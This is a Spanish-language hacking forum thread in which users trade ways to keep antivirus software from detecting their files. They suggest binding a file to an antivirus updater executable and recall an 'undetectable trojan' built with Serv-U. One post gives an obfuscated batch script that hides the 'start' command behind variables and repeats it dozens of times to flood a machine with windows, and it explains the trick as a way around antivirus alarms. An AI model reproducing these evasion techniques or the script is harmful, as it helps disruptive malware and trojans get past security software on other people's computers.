¿Hacer que no lo detecte mi antivirus?

Iniciado por avmiitxe, 8 Marzo 2011, 17:31 PM

0 Miembros y 3 Visitantes están viendo este tema.

TheInfinityJoker

Y porque no enmascararlo juntándolo con algún archivo que el antivirus no pueda analizar? Ej. si lo juntas con el .exe de actualización del antivirus, este al no analizarle, no le va a descubrir.

Fuentes: Testeado con BitDefender 2011 por mi.
Ingeniería Informática de Software - UNEX

zerocoolcom

Cita de: MrDJcKMC en 11 Abril 2011, 00:39 AM
Y porque no enmascararlo juntándolo con algún archivo que el antivirus no pueda analizar? Ej. si lo juntas con el .exe de actualización del antivirus, este al no analizarle, no le va a descubrir.

Fuentes: Testeado con BitDefender 2011 por mi.

Pero depende del antivirus la primera ves q borre todo de mi compu fue por q el karspersky q detecta todo como virus o almenos eso hacia y lo q se conecte a internet como programa malicioso me hizo la gracia de borrar el explorer entre algunos otros programas y cosas por lo q no iniciaba el sistema operativo. Igual y ya cambio igual y si depende del antivirus

Edu

Algunos antivirus detectan el System(); como codigo malicioso

TheInfinityJoker

Con el Serv-U2 se puede (o podía) hacer un troyano indetectable xDDDD
Me acuerdo que salia en alguno de los primeros números del HackxCrack, en el 1 o el 2.
Ingeniería Informática de Software - UNEX

zerocoolcom

Cita de: XXX-ZERO-XXX en 11 Abril 2011, 17:23 PM
Algunos antivirus detectan el System(); como codigo malicioso
como cual?
Nadamas para saber

Edu

Estaba drogado cuando lo dije, pero lo he escuchado que lo dicen por aca, pero parece q es mentira, asique dale pa adelante con el System() xD

TheInfinityJoker

Perdonen por mi ausencia, pero al final hiciste lo que yo te dije? O que hiciste?
Ingeniería Informática de Software - UNEX

CAR3S?

#17
no lei el th , pero te digo


set a=t
set d=s
set f=a
set n=r
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%
%d%%a%%f%%n%%a%


explico:
%d%%a%%f%%n%%a% = start

que carajos? , diras

arriba declare que:

set a=t
set d=s
set f=a
set n=r

estoy diciendo que la:
a vale "t"
d vale "s"
f vale "a"
n vale "r"

----- esto se llama cifrar ----

para indicar que es una 'variable' se usa un % al comienzo y un % al final

otro ejemplo:

set xxx=echo
set saludo=hola
set australopitecusentangacoloradaconhermosamaya=cls
@echo off
%australopitecusentangacoloradaconhermosamaya%
%xxx% %saludo%
pause


SuperDraco

vaya, ahora entiendo porque la mayoria de "virus" bat están cifrados, es para bypass la alarma de los antivirus, interesante, aunq ese cifrado es bastante básico, pero muy buena solución!!!
No he vuelto, solo estoy de paso.